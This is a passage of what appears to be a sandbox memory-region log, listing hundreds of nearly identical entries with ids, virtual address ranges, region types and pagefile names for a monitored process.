end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12021 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12022 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12023 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12024 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12025 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12026 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12027 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12028 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12029 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12030 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12031 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12032 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12033 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12034 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12035 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12036 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12037 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12038 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12039 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12040 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12041 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12042 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12043 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12044 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12045 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12046 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12047 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12048 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12049 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12050 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12051 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12054 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12055 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12056 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12057 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12058 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12059 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12060 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12061 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12062 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12063 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12064 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12065 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12066 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12067 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12068 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12069 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12070 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12071 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12072 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12074 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12075 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12076 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12077 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12078 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12079 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12080 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12081 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12082 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12083 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12084 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12085 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12086 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12087 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12088 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12089 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12090 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12091 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12092 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12093 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12094 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12095 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12096 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12097 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12098 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12099 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12100 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12101 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12102 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12103 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12104 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12105 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12106 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12107 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12108 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12109 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12110 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12111 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12112 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12113 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12114 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12115 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12116 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12117 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12120 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12121 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12122 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12123 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12124 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12125 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12126 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12127 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12128 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12129 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12130 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12131 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12132 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12133 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12134 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12135 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12136 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12140 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12141 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12142 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12143 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12144 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12145 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12146 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12147 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12148 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12149 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12150 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12151 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12152 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12153 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12154 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12155 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12156 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12157 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12158 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12159 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12160 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12161 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12162 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12163 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12164 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12165 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12166 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12167 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12168 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12169 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12170 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12171 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12172 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12173 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12174 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12175 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12176 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12177 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12178 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12179 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12180 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12181 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12182 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12183 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12184 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12185 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12186 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12187 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12188 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12189 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12190 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12191 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12192 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12193 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12194 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12195 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12196 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12198 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12199 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12200 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12201 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12202 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12203 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12204 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12205 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12206 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12207 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12208 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12209 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12210 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12211 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12212 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12213 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12214 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12215 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12216 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12217 start_va 